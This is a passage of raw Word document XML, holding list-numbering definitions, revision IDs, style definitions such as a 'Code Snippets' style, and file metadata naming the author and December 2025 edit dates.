    <w:tmpl w:val="F494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465815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03954885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25597466">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90351431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274218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71018157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8689730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38345659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920136229">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915364189">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28143202">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987708118">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601522582">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17800300">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77547574">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692106698">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69003282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584904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14812778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1100467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708406755">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292439136">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692997903">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76129832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764649443">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915819847">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816460939">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768848619">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51461208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55589818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00181328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436943038">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064714548">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13293761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831435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93745792">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208498423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05219782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994069031">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646199248">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374887054">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59324576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99807607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52242787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211866934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93974844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31394890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603851341">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848715553">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2014794374">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96464870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28458138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36020582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013141739">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889300210">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247662259">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128158205">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="58" w16cid:durableId="465705435">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="59" w16cid:durableId="114057542">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="60" w16cid:durableId="1530726984">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2013953252">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356617657">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485320675">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36146264">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69974727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8989725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49645248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94079860">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60465071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039746870">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49145654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43170709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07316289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19211334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26773914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03160883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32042526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84574751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241065950">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="80" w16cid:durableId="1375079434">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415129804">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812283783">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797913052">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283660588">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25261121">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128804518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32277921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154810203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26797742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54035963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21142994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70926118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3" w16cid:durableId="102250888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364991409">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1681664495">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164438404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81772330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990788203">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1267956833">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00" w16cid:durableId="88526066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0971027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23936940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288434808">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="104" w16cid:durableId="133911166">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="105" w16cid:durableId="714504274">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="106" w16cid:durableId="450393213">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="107" w16cid:durableId="2025398602">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="108" w16cid:durableId="723796363">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="109" w16cid:durableId="1224025949">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="110" w16cid:durableId="74674147">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105743377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1481145943">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101214866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1581715627">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1130855602">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1136989118">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186713075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76384504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389037559">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214723539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21" w16cid:durableId="47260040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22" w16cid:durableId="1895194829">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478768057">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="124" w16cid:durableId="1263606712">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="125" w16cid:durableId="1287546256">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="126" w16cid:durableId="668096170">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="127" w16cid:durableId="1988627326">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="128" w16cid:durableId="148601160">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="129" w16cid:durableId="704327947">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="130" w16cid:durableId="1051881955">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="131" w16cid:durableId="693073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70"/>
    <w:rsid w:val="00111151"/>
    <w:rsid w:val="00160BE7"/>
    <w:rsid w:val="002A5E61"/>
    <w:rsid w:val="002F2870"/>
    <w:rsid w:val="0030372C"/>
    <w:rsid w:val="003B23D0"/>
    <w:rsid w:val="003C038E"/>
    <w:rsid w:val="00423E48"/>
    <w:rsid w:val="0056348E"/>
    <w:rsid w:val="005938DE"/>
    <w:rsid w:val="006E6E99"/>
    <w:rsid w:val="007144EE"/>
    <w:rsid w:val="00750AA2"/>
    <w:rsid w:val="00821833"/>
    <w:rsid w:val="00851954"/>
    <w:rsid w:val="0087055C"/>
    <w:rsid w:val="00B51A2C"/>
    <w:rsid w:val="00BC7963"/>
    <w:rsid w:val="00DE4A6E"/>
    <w:rsid w:val="00E14A2C"/>
    <w:rsid w:val="00E32884"/>
    <w:rsid w:val="00E80C96"/>
    <w:rsid w:val="00EF001A"/>
    <w:rsid w:val="00FC0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DC3D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E932F3F5-0AFF-4A45-A692-3EE3581A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2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s">
    <w:name w:val="Code Snippets"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CodeSnippetsChar"/>
    <w:qFormat/>
    <w:rsid w:val="00423E48"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="288"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CodeSnippetsChar">
    <w:name w:val="Code Snippets Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CodeSnippets"/>
    <w:rsid w:val="00423E48"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="002F2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2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870"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="002F2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870"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="002F2870"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="002F2870"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="002F2870"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="002F2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870"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="002F2870"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00593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8DE"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005938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Pascoe</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Bill Pascoe</cp:lastModifiedBy>
  <cp:revision>12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-12-20T09:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-20T10:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>